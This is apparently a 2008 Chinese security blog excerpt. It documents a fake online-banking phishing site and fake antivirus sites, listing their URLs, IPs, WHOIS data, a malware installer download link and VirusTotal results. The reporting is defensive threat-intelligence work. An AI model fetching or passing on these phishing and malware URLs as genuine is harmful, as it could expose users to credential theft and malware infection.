目前大公司做到比較好的，大概到風險控管部分，應變處理、數位鑑識幾乎沒有。我也建議要循序漸進的培養資安人才。操作及維護>網路管理>系統管理>風險控管>應變處理>數位鑑識，每個階段大概2~3年，這樣才能有效的技術扎根，畢竟資安問題沒有技術當背景，是很容易被駭客搓破的...大家加油～～

偽裝成網路銀行網站

2008-07-14T22:22:00.002+08:00

Phishing URL(FQDN)：
hxxp://cuteplus.org/login.html

PhishTank：
http://www.phishtank.com/phish_detail.php?phish_id=475142

IP解析：
cuteplus.org->202.142.223.219

Domain Name:CUTEPLUS.ORG
Created On:28-Feb-2008 08:06:43 UTC
Last Updated On:29-Apr-2008 03:52:25 UTC
Expiration Date:28-Feb-2009 08:06:43 UTC

IP定址：
202.142.223.219@Bangkok of TH(Thailand)

#這網站是在WebHosting上
http://cuteplus.org/admin/Default.aspx
#一些有趣的東東...
http://cuteplus.org/index.html
http://cuteplus.org/user_home.html

偽裝成防毒軟體網站

2008-07-13T19:00:00.002+08:00

Phishing URL(FQDN)：
virus-onlinescanner.com
xp-registration.com

IP解析：
virus-onlinescanner.com->64.92.174.34
xp-registration.com->209.67.214.194

Domain Name: VIRUS-ONLINESCANNER.COM
Registrar: DIRECTI INTERNET SOLUTIONS PVT. LTD. D/B/A PUBLICDOMAINREGISTRY.COM
Updated Date: 26-jun-2008
Creation Date: 26-jun-2008
Expiration Date: 26-jun-2009

Domain Name: XP-REGISTRATION.COM
Registrar: DIRECTI INTERNET SOLUTIONS PVT. LTD. D/B/A PUBLICDOMAINREGISTRY.COM
Updated Date: 06-jun-2008
Creation Date: 06-jun-2008
Expiration Date: 06-jun-2009

IP定址：
64.92.174.34@Cary of US
209.67.214.194@Dallas of US

Malware File：
hxxp://virus-onlinescanner.com/download/install_v2.exe
執行惡意程式畫面，也假裝要下載安裝程式。

VirusTotal結果：(30/33)
http://www.virustotal.com/reanalisis.html?291baa30febdbf7484e083d1f1d7a0c9

#追查發現：
1.有其他釣魚網站(還沒成形)
www.updatesantivirus.com
Updated Date: 19-jun-2008
Creation Date: 19-jun-2008
Expiration Date: 19-jun-2009
2.有色情網站
?3?d?pornpic.com
?t?h?enylonporn.com